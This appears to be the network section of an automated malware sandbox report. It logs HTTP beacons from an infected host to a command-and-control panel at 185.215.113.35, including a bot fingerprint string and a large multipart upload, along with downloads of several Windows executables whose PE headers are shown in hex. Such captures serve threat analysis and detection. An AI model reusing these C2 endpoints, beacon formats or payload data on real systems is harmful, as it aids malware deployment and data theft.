                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----0f843c26b75eb09195970d1b51f66523Host: 185.215.113.35Content-Length: 105192Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 37 39 36 30 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=179605&un=user&dm=&av=13&lv=0
                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 37 39 36 30 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=179605&un=user&dm=&av=13&lv=0
                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 37 39 36 30 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=179605&un=user&dm=&av=13&lv=0
                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Host: 185.215.113.35Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 37 39 36 30 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=179605&un=user&dm=&av=13&lv=0
                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 37 39 36 30 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=179605&un=user&dm=&av=13&lv=0
                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 37 39 36 30 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=179605&un=user&dm=&av=13&lv=0
                          Source: global trafficHTTP traffic detected: GET //l/f/S2zKVH4BZ2GIX1a3NFPE/724da1c439bafff55600e6bd8e8cc799e96c0335 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 185.163.204.24
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:25:02 GMTContent-Type: application/x-msdos-programContent-Length: 301056Connection: closeLast-Modified: Mon, 10 Jan 2022 12:06:49 GMTETag: "49800-5d5392be00934"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 32 74 07 b2 76 15 69 e1 76 15 69 e1 76 15 69 e1 68 47 fc e1 69 15 69 e1 68 47 ea e1 fc 15 69 e1 68 47 ed e1 5b 15 69 e1 51 d3 12 e1 71 15 69 e1 76 15 68 e1 f9 15 69 e1 68 47 e3 e1 77 15 69 e1 68 47 fd e1 77 15 69 e1 68 47 f8 e1 77 15 69 e1 52 69 63 68 76 15 69 e1 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 d4 e8 62 5f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 1e 01 00 00 f6 03 00 00 00 00 00 9f 2d 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 20 05 00 00 04 00 00 a7 ea 04 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b0 65 01 00 50 00 00 00 00 00 04 00 b0 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 32 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 59 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c5 1d 01 00 00 10 00 00 00 1e 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 44 3f 00 00 00 30 01 00 00 40 00 00 00 22 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 58 84 02 00 00 70 01 00 00 24 02 00 00 62 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 10 01 00 00 00 04 00 00 12 01 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:25:08 GMTContent-Type: application/x-msdos-programContent-Length: 322560Connection: closeLast-Modified: Fri, 14 Jan 2022 08:25:02 GMTETag: "4ec00-5d5868a108476"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a5 fa 3c cc e1 9b 52 9f e1 9b 52 9f e1 9b 52 9f ff c9 c7 9f fb 9b 52 9f ff c9 d1 9f 67 9b 52 9f c6 5d 29 9f e2 9b 52 9f e1 9b 53 9f 01 9b 52 9f ff c9 d6 9f db 9b 52 9f ff c9 c6 9f e0 9b 52 9f ff c9 c3 9f e0 9b 52 9f 52 69 63 68 e1 9b 52 9f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 39 c1 2d 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 09 00 00 f2 03 00 00 a8 11 00 00 00 00 00 00 c1 01 00 00 10 00 00 00 10 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 f0 15 00 00 04 00 00 12 06 05 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 24 ee 03 00 28 00 00 00 00 10 15 00 b8 83 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 15 00 f4 1d 00 00 90 13 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 91 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 44 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 94 f1 03 00 00 10 00 00 00 f2 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 88 c9 10 00 00 10 04 00 00 18 00 00 00 f6 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 67 61 76 65 00 00 00 05 00 00 00 00 e0 14 00 00 02 00 00 00 0e 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 6f 64 75 66 00 00 ea 00 00 00 00 f0 14 00 00 02 00 00 00 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 67 61 66 61 6c 00 00 93 0d 00 00 00 00 15 00 00 0e 00 00 00 12 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b8 83 00 00 00 10 15 00 00 84 00 00 00 20 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 64 46 00 00 00 a0 15 00 00 48 00 00 00 a4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:25:41 GMTContent-Type: application/x-msdos-programContent-Length: 905216Connection: closeLast-Modified: Thu, 13 Jan 2022 15:53:07 GMTETag: "dd000-5d578aeb4049d"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8b cf 9c fb cf ae f2 a8 cf ae f2 a8 cf ae f2 a8 d1 fc 67 a8 d3 ae f2 a8 d1 fc 71 a8 49 ae f2 a8 d1 fc 76 a8 e1 ae f2 a8 e8 68 89 a8 cc ae f2 a8 cf ae f3 a8 45 ae f2 a8 d1 fc 78 a8 ce ae f2 a8 d1 fc 66 a8 ce ae f2 a8 d1 fc 63 a8 ce ae f2 a8 52 69 63 68 cf ae f2 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 cf 5b b6 5f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 20 01 00 00 32 0d 00 00 00 00 00 00 30 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 50 7c 02 00 04 00 00 e4 71 0e 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 58 66 01 00 28 00 00 00 00 70 0d 00 20 cd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 31 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 59 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 88 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 13 1e 01 00 00 10 00 00 00 20 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 22 3f 00 00 00 30 01 00 00 40 00 00 00 24 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 38 fe 0b 00 00 70 01 00 00 9e 0b 00 00 64 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 20 dd 6e 02 00 70 0d 00 00 ce 00 00 00 02 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:25:46 GMTContent-Type: application/x-msdos-programContent-Length: 373760Connection: closeLast-Modified: Wed, 12 Jan 2022 08:30:43 GMTETag: "5b400-5d55e62ba577e"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 6c cb d2 55 28 aa bc 06 28 aa bc 06 28 aa bc 06 36 f8 29 06 31 aa bc 06 36 f8 3f 06 57 aa bc 06 0f 6c c7 06 2b aa bc 06 28 aa bd 06 f5 aa bc 06 36 f8 38 06 11 aa bc 06 36 f8 28 06 29 aa bc 06 36 f8 2d 06 29 aa bc 06 52 69 63 68 28 aa bc 06 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 61 a2 52 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 09 00 00 c2 04 00 00 76 12 00 00 00 00 00 40 a1 02 00 00 10 00 00 00 e0 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 80 17 00 00 04 00 00 e2 26 06 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 94 be 04 00 28 00 00 00 00 b0 16 00 10 7b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 17 00 14 1d 00 00 80 13 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 8f 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 38 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e8 c1 04 00 00 10 00 00 00 c2 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 bc 9f 11 00 00 e0 04 00 00 18 00 00 00 c6 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 67 69 7a 69 00 00 00 05 00 00 00 00 80 16 00 00 02 00 00 00 de 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 75 72 00 00 00 00 ea 00 00 00 00 90 16 00 00 02 00 00 00 e0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 77 6f 62 00 00 00 00 93 0d 00 00 00 a0 16 00 00 0e 00 00 00 e2 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 10 7b 00 00 00 b0 16 00 00 7c 00 00 00 f0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 34 46 00 00 00 30 17 00 00 48 00 00 00 6c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:26:02 GMTContent-Type: application/x-msdos-programContent-Length: 905216Connection: closeLast-Modified: Thu, 13 Jan 2022 15:53:07 GMTETag: "dd000-5d578aeb4049d"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8b cf 9c fb cf ae f2 a8 cf ae f2 a8 cf ae f2 a8 d1 fc 67 a8 d3 ae f2 a8 d1 fc 71 a8 49 ae f2 a8 d1 fc 76 a8 e1 ae f2 a8 e8 68 89 a8 cc ae f2 a8 cf ae f3 a8 45 ae f2 a8 d1 fc 78 a8 ce ae f2 a8 d1 fc 66 a8 ce ae f2 a8 d1 fc 63 a8 ce ae f2 a8 52 69 63 68 cf ae f2 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 cf 5b b6 5f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 20 01 00 00 32 0d 00 00 00 00 00 00 30 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 50 7c 02 00 04 00 00 e4 71 0e 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 58 66 01 00 28 00 00 00 00 70 0d 00 20 cd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 31 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 59 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 88 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 13 1e 01 00 00 10 00 00 00 20 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 22 3f 00 00 00 30 01 00 00 40 00 00 00 24 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 38 fe 0b 00 00 70 01 00 00 9e 0b 00 00 64 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 20 dd 6e 02 00 70 0d 00 00 ce 00 00 00 02 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:26:07 GMTContent-Type: application/x-msdos-programContent-Length: 557664Connection: closeLast-Modified: Thu, 13 Jan 2022 19:20:04 GMTETag: "88260-5d57b92d7ebed"Accept-Ranges: bytesData Raw: 4d 5a e2 15 17 e8 ec 6f ac 01 a3 67 88 27 b0 3a 07 28 33 98 08 dd 33 32 a2 e3 d0 db df 66 f6 e9 c8 9b f0 ce 43 27 42 7b 62 19 d6 e4 19 09 05 f6 16 cd 2b 9a c3 52 c6 c7 98 88 64 3a 00 01 00 00 0b 51 d1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 d6 ad 35 ab 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 24 03 00 00 2a 03 00 00 00 00 00 00 b0 06 00 00 20 00 00 00 60 03 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 30 08 00 00 04 00 00 1c 40 09 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 70 03 00 e4 01 00 00 00 80 03 00 50 29 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 69 64 61 74 61 00 00 00 60 03 00 00 10 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 2e 70 64 61 74 61 00 00 00 10 00 00 00 70 03 00 00 02 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 50 29 03 00 00 80 03 00 30 06 03 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 61 00 00 80 01 00 00 b0 06 00 fc 78 01 00 00 0e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
